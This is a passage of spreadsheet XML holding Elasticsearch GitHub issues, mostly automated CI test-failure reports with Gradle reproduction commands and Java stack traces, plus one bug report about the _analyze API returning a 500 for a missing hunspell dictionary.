org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.handleIncomingRequest(AbstractHttpServerTransport.java:554)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.incomingRequest(AbstractHttpServerTransport.java:431)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.handlePipelinedRequest(Netty4HttpPipeliningHandler.java:128)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.channelRead(Netty4HttpPipeliningHandler.java:118)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageCodec.channelRead(MessageToMessageCodec.java:111)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)\n\tat io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:103)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.94.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.94.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1583)\nCaused by: org.elasticsearch.xcontent.XContentParseException: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$errorOnUnknown$2(ObjectParser.java:105)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:299)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.parse(ConstructingObjectParser.java:166)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.apply(ConstructingObjectParser.java:158)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.vectors.KnnVectorQueryBuilder.fromXContent(KnnVectorQueryBuilder.java:91)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.lambda$static$1(BoolQueryBuilder.java:266)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.parseArray(AbstractObjectParser.java:418)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.lambda$declareObjectArrayOrNull$13(AbstractObjectParser.java:304)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$declareField$10(ObjectParser.java:431)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:609)\n\t 64 more\n"},"status":400}]  **Issue Reasons:** - [8.x] 3 consecutive failures in step 8.13.4_bwc - [8.x] 6 failures in test test {p0=search.vectors/110_knn_query_with_filter/PRE_FILTER: knn query with alias filter as pre-filter} (2.9% fail rate in 209 executions) - [8.x] 2 failures in step 8.12.2_bwc (50.0% fail rate in 4 executions) - [8.x] 3 failures in step 8.13.4_bwc (75.0% fail rate in 4 executions) - [8.x] 3 failures in pipeline elasticsearch-periodic (75.0% fail rate in 4 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119806</t>
  </si>
  <si>
    <t>[CI] MixedClusterClientYamlTestSuiteIT class failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5895 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/wj7zukdblxcwg) - [elasticsearch-intake #15984 / 8.17.1_bwc-snapshots](https://gradle-enterprise.elastic.co/s/sph4qyfmvr3c2) - [elasticsearch-periodic #5890 / 8.14.3_bwc](https://gradle-enterprise.elastic.co/s/zgfegd2luog4u) - [elasticsearch-periodic #5890 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/yzqgjrmufbbhe) **Reproduction Line:**  ./gradlew ":qa:mixed-cluster:v8.13.4#mixedClusterTest" -Dtests.class="org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT" -Dtests.method="test {p0=search.vectors/160_knn_query_missing_params/kNN search used in nested field - missing num_candidates}" -Dtests.seed=BF9B1B70A38FCCCC -Dtests.bwc=true -Dtests.locale=mi-Latn-NZ -Dtests.timezone=Australia/North -Druntime.java=23  **Applicable branches:** 8.x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backwards.MixedClusterClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [search.vectors/160_knn_query_missing_params:171]: expected [2xx] status code but api [search] returned [400 Bad Request] [{"error":{"root_cause":[{"type":"x_content_parse_exception","reason":"[1:129] [knn] unknown field [k]","stack_trace":"org.elasticsearch.ElasticsearchException$1: [1:129] [knn] unknown field [k]\n\tat org.elasticsearch.server@8.13.4/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:701)\n\tat org.elasticsearch.server@8.13.4/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:629)\n\tat org.elasticsearch.server@8.13.4/org.elasticsearch.rest.RestResponse.build(RestResponse.java:184)\n\tat org.elasticsearch.server@8.13.4/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:143)\n\tat org.elasticsearch.server@8.13.4/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:114)\n\tat org.elasticsearch.server@8.13.4/org.elasticsearch.rest.RestContro [truncated]  **Issue Reasons:** - [8.x] 2 consecutive failures in step 8.13.4_bwc - [8.x] 4 failures in class org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT (1.2% fail rate in 335 executions) - [8.x] 2 failures in step 8.13.4_bwc (50.0% fail rate in 4 executions) - [8.x] 2 failures in pipeline elasticsearch-periodic (50.0% fail rate in 4 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/120597</t>
  </si>
  <si>
    <t>[CI] FullClusterRestartLuceneIndexCompatibilityIT class failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #16163 / part1](https://gradle-enterprise.elastic.co/s/6ladsukuqs5ga) - [elasticsearch-pull-request #51853 / part-1](https://gradle-enterprise.elastic.co/s/ruzkezk3zspny) - [elasticsearch-pull-request #51868 / part-1](https://gradle-enterprise.elastic.co/s/qmvejgipqv6uc) - [elasticsearch-pull-request #51866 / part-1](https://gradle-enterprise.elastic.co/s/o6v6errfgzrwq) - [elasticsearch-pull-request #51872 / part-1](https://gradle-enterprise.elastic.co/s/mc6uurqpnju7u) - [elasticsearch-pull-request #51860 / part-1](https://gradle-enterprise.elastic.co/s/rdbml42e3mzw4) - [elasticsearch-pull-request #51871 / part-1](https://gradle-enterprise.elastic.co/s/nvu5v2766ycte) - [elasticsearch-intake #16162 / part1](https://gradle-enterprise.elastic.co/s/7nsgw3khntgiw) - [elasticsearch-pull-request #51862 / part-1](https://gradle-enterprise.elastic.co/s/kpofq6yczwruk) - [elasticsearch-pull-request #51851 / part-1](https://gradle-enterprise.elastic.co/s/jt6cofe3revdi) **Reproduction Line:**  ./gradlew ":qa:lucene-index-compatibility:javaRestTest" --tests "org.elasticsearch.lucene.FullClusterRestartLuceneIndexCompatibilityIT" -Dtests.method="testIndexUpgrade {p0=8.18.0}" -Dtests.seed=B3472861BD6EB6C7 -Dtests.locale=xnr-Deva-IN -Dtests.timezone=Europe/Warsaw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lucene.FullClusterRestartLuceneIndexCompatibilityIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(org.elasticsearch.lucene.FullClusterRestartLuceneIndexCompatibilityIT),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [PUT], host [http://[::1]:40235], URI [/index-testindexupgrade/_settings], status line [HTTP/1.1 400 Bad Request] :) errorroot_causetypeYillegal_argument_exception reasoncan not update private setting [index.verified_read_only]; this setting is managed by ElasticsearchBYillegal_argument_exceptionCcan not update private setting [index.verified_read_only]; this setting is managed by Elasticsearch status$   **Issue Reasons:** - [main] 10 consecutive failures in class org.elasticsearch.lucene.FullClusterRestartLuceneIndexCompatibilityIT - [main] 2 consecutive failures in step part1 - [main] 8 consecutive failures in step part-1 - [main] 2 consecutive failures in pipeline elasticsearch-intake - [main] 8 consecutive failures in pipeline elasticsearch-pull-request - [main] 16 failures in class org.elasticsearch.lucene.FullClusterRestartLuceneIndexCompatibilityIT (6.5% fail rate in 245 executions) - [main] 2 failures in step part1 (5.6% fail rate in 36 executions) - [main] 14 failures in step part-1 (11.4% fail rate in 123 executions) - [main] 2 failures in pipeline elasticsearch-intake (5.6% fail rate in 36 executions) - [main] 13 failures in pipeline elasticsearch-pull-request (10.7% fail rate in 121 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121128</t>
  </si>
  <si>
    <t>[CI] CoreWithSecurityClientYamlTestSuiteIT test {yaml=cat.aliases/40_hidden/Test cat aliases output with a visible index with a hidden alias} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6135 / ubuntu-2204_platform-support-unix](https://gradle-enterprise.elastic.co/s/vdqvig6scxui2) - [elasticsearch-pull-request #53493 / part-4](https://gradle-enterprise.elastic.co/s/s3ekgm2kfegpw) **Reproduction Line:**  ./gradlew ":x-pack:qa:core-rest-tests-with-security:yamlRestTest" --tests "org.elasticsearch.xpack.security.CoreWithSecurityClientYamlTestSuiteIT" -Dtests.method="test {yaml=cat.aliases/40_hidden/Test cat aliases output with a visible index with a hidden alias}" -Dtests.seed=117A714B04E111B2 -Dtests.locale=es-CL -Dtests.timezone=Canada/Eastern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xpack.security.CoreWithSecurityClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dcat.aliases%2F40_hidden%2FTest%20cat%20aliases%20output%20with%20a%20visible%20index%20with%20a%20hidden%20alias%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [cat.aliases/40_hidden:124]: field [$body] was expected to match the provided regex but didn't Expected: ^ test_alias \s+ test \s+ - \s+ - \s+ - \s+ - \s+ $ but: was "test_alias test - - - -\n.security .security-7 - - - -\n"  **Issue Reasons:** - [main] 2 failures in test test {yaml=cat.aliases/40_hidden/Test cat aliases output with a visible index with a hidden alias} (0.2% fail rate in 846 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121186</t>
  </si>
  <si>
    <t>[CI] CoreWithSecurityClientYamlTestSuiteIT test {yaml=cat.aliases/10_basic/Simple alias} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6057 / rocky-9_platform-support-unix](https://gradle-enterprise.elastic.co/s/juccbp5g256us) - [elasticsearch-pull-request #53493 / part-4](https://gradle-enterprise.elastic.co/s/s3ekgm2kfegpw) - [elasticsearch-pull-request #53066 / part-4](https://gradle-enterprise.elastic.co/s/zendjucdbvdys) - [elasticsearch-pull-request #52883 / part-4](https://gradle-enterprise.elastic.co/s/dgiaqd4vwapdo) **Reproduction Line:**  ./gradlew ":x-pack:qa:core-rest-tests-with-security:yamlRestTest" --tests "org.elasticsearch.xpack.security.CoreWithSecurityClientYamlTestSuiteIT" -Dtests.method="test {yaml=cat.aliases/10_basic/Simple alias}" -Dtests.seed=50A1D3280E7B1139 -Dtests.locale=th -Dtests.timezone=Etc/GMT-2 -Druntime.java=23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xpack.security.CoreWithSecurityClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dcat.aliases%2F10_basic%2FSimple%20alias%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [cat.aliases/10_basic:70]: field [$body] was expected to match the provided regex but didn't Expected: ^ test_alias \s+ test \s+ - \s+ - \s+ - \s+ - \s+ $ but: was "test_alias test - - - -\n.security .security-7 - - - -\n"  **Issue Reasons:** - [main] 4 failures in test test {yaml=cat.aliases/10_basic/Simple alias} (0.7% fail rate in 542 executions) - [main] 3 failures in step part-4 (1.1% fail rate in 269 executions) - [main] 3 failures in pipeline elasticsearch-pull-request (1.1% fail rate in 261 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121287</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_357} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6074 / ubuntu-2404_platform-support-unix](https://gradle-enterprise.elastic.co/s/n33wismegevni) - [elasticsearch-pull-request #53493 / part-1](https://gradle-enterprise.elastic.co/s/mmuxqoostbhkg) - [elasticsearch-pull-request #53066 / part-1](https://gradle-enterprise.elastic.co/s/hqft4j7abaoao) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_357}" -Dtests.seed=A00CBB485E84139B -Dtests.locale=luo-KE -Dtests.timezone=Africa/Ndjamena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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fsnapshot-restore%2Fapis%2Fget-snapshot-api%2Fline_357%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/snapshot-restore/apis/get-snapshot-api:78]: Expected a map containing snapshots: a list containing 0: a map containing failures: an empty list include_global_state: &lt;true&gt; end_time: "2025-01-30T13:15:40.728Z" duration_in_millis: &lt;0&gt; version_id: &lt;9008000&gt; repository: "my_repository" uuid: "EjOW137vT4m3kQn2M_UdoQ" version: "9.0.0" start_time: "2025-01-30T13:15:40.728Z" shards: a map containing total: expected &lt;0&gt; but was &lt;1&gt; failed: &lt;0&gt; successful: expected &lt;0&gt; but was &lt;1&gt; indices: an empty list 0: &lt;unexpected&gt; but was ".security-7" feature_states: an empty list 0: &lt;unexpected&gt; but was &lt;{feature_name=security, indices=[.security-7]}&gt; start_time_in_millis: &lt;1738242940728L&gt; data_streams: an empty list [truncated]  **Issue Reasons:** - [main] 3 failures in test test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_357} (0.4% fail rate in 801 executions) - [main] 2 failures in step part-1 (0.6% fail rate in 352 executions) - [main] 2 failures in pipeline elasticsearch-pull-request (0.5% fail rate in 384 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121337</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/rest-api/security/invalidate-tokens/line_194} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6079 / almalinux-9_platform-support-unix](https://gradle-enterprise.elastic.co/s/6eqbtqy6spzdq) - [elasticsearch-pull-request #53493 / part-1](https://gradle-enterprise.elastic.co/s/mmuxqoostbhkg) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/rest-api/security/invalidate-tokens/line_194}" -Dtests.seed=9560C65A851EF9F8 -Dtests.locale=sd-Arab -Dtests.timezone=America/Kentucky/Monticello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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Frest-api%2Fsecurity%2Finvalidate-tokens%2Fline_194%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/rest-api/security/invalidate-tokens:119]: expected [2xx] status code but api [raw[method=DELETE path=_security/oauth2/token]] returned [404 Not Found] [{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index [.security-tokens]","resource.type":"index_or_alias","resource.id":".security-tokens","index_uuid":"_na_","index":".security-tokens","stack_trace":"[.security-tokens] org.elasticsearch.index.IndexNotFoundException: no such index [.security-tokens]\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.notFoundException(IndexNameExpressionResolver.java:685)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.ensureAliasOrIndexExists(IndexNameExpressionResolver.java:1321)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.resolveExpressionsToR [truncated]  **Issue Reasons:** - [main] 2 failures in test test {yaml=reference/rest-api/security/invalidate-tokens/line_194} (0.3% fail rate in 608 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121354</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlAsyncIT class failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #6099 / release-tests](https://gradle-enterprise.elastic.co/s/hwctsbb75vtfw) - [elasticsearch-periodic #6092 / release-tests](https://gradle-enterprise.elastic.co/s/ajyw5ebj67ooe) - [elasticsearch-pull-request #54210 / checkpart3_release-tests](https://gradle-enterprise.elastic.co/s/5ffctly7hidqa) - [elasticsearch-pull-request #54121 / checkpart3_release-tests](https://gradle-enterprise.elastic.co/s/t2fxk66v4lros) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:single-node:yamlRestTest" --tests "org.elasticsearch.xpack.esql.qa.single_node.EsqlClientYamlAsyncIT.test {p0=esql/46_downsample/Query stats on downsampled index}" -Dtests.seed=8D86EC19CBC01EB7 -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=ff-Latn-BF -Dtests.timezone=Asia/Pyongyang -Druntime.java=23  **Applicable branches:** 9.0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xpack.esql.qa.single_node.EsqlClientYamlAsyncIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(org.elasticsearch.xpack.esql.qa.single_node.EsqlClientYamlAsyncIT),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/46_downsample:98]: expected [2xx] status code but api [esql.async_query] returned [400 Bad Request] [{"error":{"root_cause":[{"type":"verification_exception","reason":"Found 1 problem\nline 1:34: Cannot use field [k8s.pod.network.rx] with unsupported type [aggregate_metric_double]","stack_trace":"org.elasticsearch.xpack.esql.VerificationException: Found 1 problem\nline 1:34: Cannot use field [k8s.pod.network.rx] with unsupported type [aggregate_metric_double]\n\tat org.elasticsearch.xpack.esql.analysis.Analyzer.verify(Analyzer.java:189)\n\tat org.elasticsearch.xpack.esql.analysis.Analyzer.analyze(Analyzer.java:183)\n\tat org.elasticsearch.xpack.esql.session.EsqlSession.lambda$analyzedPlan$7(EsqlSession.java:304)\n\tat org.elasticsearch.xpack.esql.session.EsqlSession.analyzeAndMaybeRetry(EsqlSession.java:511)\n\tat org.elasticsearch.xpack.esql.session.EsqlSession.lambda$analyzedPlan$16(EsqlSession.java:349)\n\tat org.elasticsearch.server@9.0.0/ [truncated]  **Issue Reasons:** - [9.0] 2 consecutive failures in step release-tests - [9.0] 4 failures in class org.elasticsearch.xpack.esql.qa.single_node.EsqlClientYamlAsyncIT (7.0% fail rate in 57 executions) - [9.0] 2 failures in step release-tests (100.0% fail rate in 2 executions) - [9.0] 2 failures in step checkpart3_release-tests (66.7% fail rate in 3 executions) - [9.0] 2 failures in pipeline elasticsearch-periodic (100.0% fail rate in 2 executions) - [9.0] 2 failures in pipeline elasticsearch-pull-request (28.6% fail rate in 7 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121443</t>
  </si>
  <si>
    <t>When calling the _analyze API, it should be a 4xx when dictionary files are missing</t>
  </si>
  <si>
    <t xml:space="preserve"> Elasticsearch Version _any_  Installed Plugins _No response_  Java Version _bundled_  OS Version _any_  Problem Description When calling the `_analyze` API, its possible to explore using it to see how things work with various dictionary files. However ,if a dictionary file is completely missing, this API throws a 5xx. For all analyzers that depend on user provided dictionaries, we should return a 4xx not a 5xx. Example: when using `hunspell` it should be a 4xx if the dictionary is missing as that needs to be provided by the admin of the cluster.  Steps to Reproduce  GET /_analyze { "tokenizer": "standard", "filter": {"type": "hunspell", "locale": "en_US"}, "text": "the knife foxes jumping quickly over knives" }   Logs (if relevant)  { "error": { "root_cause": [ { "type": "illegal_state_exception", "reason": "failed to load hunspell dictionary for locale: en_US" } ], "type": "illegal_state_exception", "reason": "failed to load hunspell dictionary for locale: en_US", "caused_by": { "type": "exception", "reason": "Could not find hunspell dictionary [en_US]" } }, "status": 500 }  Full error:  org.elasticsearch.transport.RemoteTransportException: [es-es-search-5b7c555d59-xtvz7][100.66.132.194:9300][indices:admin/analyze[s]]\nCaused by: java.lang.IllegalStateException: failed to load hunspell dictionary for locale: en_US\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.indices.analysis.HunspellService.lambda$new$0(HunspellService.java:102)\n\tat java.base/java.util.concurrent.ConcurrentHashMap.computeIfAbsent(ConcurrentHashMap.java:1713)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.indices.analysis.HunspellService.getDictionary(HunspellService.java:119)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.index.analysis.HunspellTokenFilterFactory.&lt;init&gt;(HunspellTokenFilterFactory.java:34)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.indices.analysis.AnalysisModule.lambda$setupTokenFilters$0(AnalysisModule.java:163)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.plugins.AnalysisPlugin$1.get(AnalysisPlugin.java:128)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.index.analysis.AnalysisRegistry.getComponentFactory(AnalysisRegistry.java:132)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.index.analysis.AnalysisRegistry.buildCustomAnalyzer(AnalysisRegistry.java:267)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.admin.indices.analyze.TransportAnalyzeAction.buildCustomAnalyzer(TransportAnalyzeAction.java:218)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.admin.indices.analyze.TransportAnalyzeAction.analyze(TransportAnalyzeAction.java:143)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.admin.indices.analyze.TransportAnalyzeAction.shardOperation(TransportAnalyzeAction.java:129)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.admin.indices.analyze.TransportAnalyzeAction.shardOperation(TransportAnalyzeAction.java:66)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.support.single.shard.TransportSingleShardAction.lambda$asyncShardOperation$0(TransportSingleShardAction.java:113)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.ActionRunnable$3.accept(ActionRunnable.java:79)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.ActionRunnable$3.accept(ActionRunnable.java:76)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.action.ActionRunnable$4.doRun(ActionRunnable.java:101)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.base/java.lang.Thread.run(Thread.java:1575)\nCaused by: org.elasticsearch.ElasticsearchException: Could not find hunspell dictionary [en_US]\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.indices.analysis.HunspellService.loadDictionary(HunspellService.java:168)\n\tat org.elasticsearch.server@9.0.0/org.elasticsearch.indices.analysis.HunspellService.lambda$new$0(HunspellService.java:100)\n\t 20 more\n </t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121513</t>
  </si>
  <si>
    <t>[CI] CoreWithSecurityClientYamlTestSuiteIT test {yaml=cat.aliases/10_basic/Complex alias} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #17086 / part4](https://gradle-enterprise.elastic.co/s/ygngpolfmwbkc) - [elasticsearch-pull-request #53493 / part-4](https://gradle-enterprise.elastic.co/s/s3ekgm2kfegpw) **Reproduction Line:**  ./gradlew ":x-pack:qa:core-rest-tests-with-security:yamlRestTest" --tests "org.elasticsearch.xpack.security.CoreWithSecurityClientYamlTestSuiteIT" -Dtests.method="test {yaml=cat.aliases/10_basic/Complex alias}" -Dtests.seed=26B2C4402651315F -Dtests.locale=ca -Dtests.timezone=America/Porto_Velho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xpack.security.CoreWithSecurityClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dcat.aliases%2F10_basic%2FComplex%20alias%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [cat.aliases/10_basic:138]: field [$body] was expected to match the provided regex but didn't Expected: ^ test_alias \s+ test \s+ [*] \s+ ir \s+ sr1,sr2 \s+ true \s+ $ but: was "test_alias test * ir sr1,sr2 true\n.security .security-7 - - - -\n"  **Issue Reasons:** - [main] 2 failures in test test {yaml=cat.aliases/10_basic/Complex alias} (0.2% fail rate in 935 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
